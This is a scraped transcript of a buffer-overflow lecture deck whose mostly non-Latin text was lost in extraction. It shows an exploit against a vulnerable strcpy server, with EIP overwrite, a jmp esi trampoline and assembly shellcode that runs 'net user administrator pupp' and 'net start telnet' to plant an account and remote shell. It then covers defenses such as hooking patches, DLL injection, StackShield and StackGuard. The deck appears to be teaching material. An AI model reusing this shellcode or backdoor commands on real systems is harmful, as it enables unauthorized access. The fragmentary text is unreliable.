Buffer Overflow

  • Published on
    11-Jan-2016

  • View
    57

  • Download
    10

Embed Size (px)

DESCRIPTION

. -. -. Buffer Overflow. ?. Buffer OverFlow BOF BOF . buffer overflow ?. - PowerPoint PPT Presentation

Transcript

  • ? Buffer OverFlow BOF BOF

  • buffer overflow? buffer . . Buffer overflow c " : strcpy, strcat, gets , .

  • telnet administrator Buffer Overflow

    Patch 2 :

  • ? Server.exe

    , . socket . , socket. - socket , buffer. strcpy , ( BUG).

  • Bad_client.exe

    buffer . : . telnet . " telnet.

  • Buffer recv( m_socket, recvbuf, 1000, 0 );recvbuf : Buffer revieved from the client Size : 1000copyBuf(recvbuf);copyBuf(char *arr){ myArr[500]; strcpy(myArr,arr);}myArr : a local variable in the server Size : 500main { }Oopsrecvbuf[1000];

  • ' - return address " EIP . ? " - : aaabbbccccdddde . exploit? ( buffer )

  • :

    buffer .aaa..aaa , a- (a = 61 ascii) . , , abcd (a=61,b=62, c=63, d=64) . .

  • . , , eip . : buffer ( buffer). '

  • :

  • Buffer 0x77E641670x77E64167 EVIL CODE

  • : ? eip , buffer , . register , . , : esi 0x0012f5a8

    , server buffer overflow : 0x0012f3a8 0x0012f59c 00x0 (=null) buffer char, , send, .

  • (esi) ? jmp esi ( opcode : FF F6), , , , ". dll server - ". dll . kernel32.dll dll base address " ?

  • ' buffer buffer . buffer opcodes , .

  • ? . C :system(set user administrator pupp); telnetsystem(net start telnet); . , .

  • . . , . :

  • ?

  • ebpebpxor edi, edi push edi /0Way of Creating null

  • ebpebpSub esp 18h mov byte ptr[ebp-1Ch],6Eh (=n)

    mov byte ptr[ebp-1Bh],65h (=e) mov byte ptr[ebp-1Ah],74h (=t) /0ne t esp - Making room in the stack for our string: net user administrator pupp - entering the string into the stack

  • ebpebp /0net user administrator pupp /0net start telnetesp - Making room in the stack for our string: net start telnet - entering the string into the stack

  • ebpebp /0net user administrator pupp /0net start telnetespMov eax, 0x77bb8c10 Push eaxAddress of System function Pushing the address of the function system on XP

  • ebpebp /0net user administrator pupp /0net start telnetesplea edx, [ebp-1Ch] push edxAddress of System function loading the n of the net user administrator pupp edx

  • ebpebp /0net user administrator pupp /0net start telnetespcall dward ptr [ebp-34h]Address of System function calling the system function edx

  • ebpebp /0net user administrator pupp /0net start telnetespadd esp, 4 lea edx, [ebp-30h] push edx call dward ptr [ebp-34h]Address of System function The same with the second string : loading the n of the net start telnet calling the system function edx

  • . C : #include #include void main(){LoadLibrary("msvcrt.dll);__asm{ push ebp mov ebp,esp . } } assembly " __asm { our code } debug ( (ctrl F11 opcodes . opcodes , buffer . DLL .

  • ' patch patch server , hooks . CreateRemoteThread strcpy ) , CheckProc) strcpy

  • server.exegood_client.exe / bad_client.exePatch.exe fix.dll ( fix2.dll ) server.exe Hooksfix.dll CheckProc strcpy. strcpy.HookProc fix.dll (" Hook) server strcpy CheckProc CreateRemoteThreadfix2.dllCheckProc ".dllMain fix2.dll (" CreateRemoteThread) ".

  • Hooks (Win OS) -hooks , hooking " , , , dll . dll ' .

  • Hooks (Win OS)

    WH_CBT , . , / .

    hFixDll dll ( Set) .

    addrHookProc -dll

    0 hook ( ' server )SetWindowsHookEx(WH_CBT, addrHookProc,hFixDll,0)

  • ...1. server2. Server MessageBox

    6. Message Box .3. patch hook event server 9. patch Unhook 4. hook dll.7. hook server, dll server8. hookProc server, server ("") event patch server .5. hookProc server .

  • :1. CheckProc fix.dll strcpy buffer strcpy. ( )2. debugger () call strcpy.3. " getProcAddress ( map, DropBin) dll. ( )4. call CheckProc .

  • - :: HookProc server.1. (VirtualProtect)2. call checkProc.3. . (VirtualProtect)

  • Demo Codeusing Hooks

  • 2: CreateRemoteThread , Debug .: LoadLibrary dll dll dllMain HookProc . CreateRemoteThread ., LoadLibrary CreateRemoteThread . - - WINAPI HINSTANCE LoadLibrary(PCTSTR pszLibFile) DWORD WINAPI ThreadFunc(PVOID pvParam), , CreateRemoteThread(hProcessRemote,NULL,0,LoadLibraryA, c:\\fix.dll ,0,NULL) ...

  • 2: CreateRemoteThread - . LoadLibraryA : (, ", kernel32 )GetProcAdress(GetModulteHandle(kernel32,LoadLibraryA));. c:\\fix.dll , , LoadLibraryA(c:\\fix.dll) .: VirtualAlloc , .

    :

  • 2: CreateRemoteThread - VirtualAllocEx " path dll WriteProcessMemory LoadLibraryA ( LoadLibraryW Unicode) CreateRemoteThread LoadLibraryA 2,3 dllMain "" DllMain HookProc : Hooks ! WaitForSingleObject .

  • Demo Codeusing CreateRemoteThread

  • Dll Server dll: 1. -hooks 2. CreateRemoteThread 3. registry 4. dll 5. 98

  • Dll -Registry dll- registry User32.dll . -dll registry .

    : unmap dll " GUI User32.dll

  • Dll dll- -dll

    : -dll ' -dll

  • Dll 98-patch -dll. debugger -dll 98 2GB MapViewOfFile -dll -dll

  • Dll 98 (2): -Dll -CreateRemoteThread -dll Win98 - CreateRemoteThread

  • BOF 1 2 Stuck Guard3 Stack Shield

  • 1:-patch VirtualProtect -strcpy -dll : TEXT ( ) WatchDog - VirtualProtect

  • 1 (): : ret ( ) -esp stack.

  • BOF 1 2 Stack Shield3 Stuck Guard

  • - 2Stack Shield :: : , , BOF : BOF

  • BOF 1 2 Stack Shield3 Stuck Guard

  • 3 () ' 2 : S1 -S2. S1 strcpy p1 S2 ( ) p2.

    - :S1 BOF p2 . -p2 .-S2 , !

  • -3Stack Guard

  • 3 () - "canary" , "canary" '

    : " spoofing

  • 3 ():1. 4 :NULL(0x00), CR (0x0d), LF (0x0a) , EOF (0xff) string ,

    2. " ' hash

  • P1P2canaryReturn address

  • 3 (): , -XOR ,

  • Buffer Overflow - ? CERT ( ) " BOF.

    " BufferOverflow

  • Buffer Overflow ?

  • Buffer Overflow ?

    " bufferoverflow

    Chart1

    10

    51

    70

    202

    141

    150

    132

    133

    273

    2815

    137

    115

    Total vulnerabilities

    Buffer overrun vulnerabilities

    Sheet1

    198810

    198951

    199070

    1991202

    1992141

    1993150

    1994132

    1995133

    1996273

    19962815

    1998137

    1999115

    Chart2

    0

    0.2

    0

    0.1

    0.07

    0

    0.15

    0.23

    0.11

    0.54

    0.54

    0.45

    Percentage of vulnerabilities that are buffer overruns

    Sheet2

    19880%

    198920%

    19900%

    199110%

    19927%

    19930%

    199415%

    199523%

    199611%

    199754%

    199854%

    199945%

    Sheet3

  • http://www.rocklinux.net/people/clifford/BufferOverflow/p56-5.txt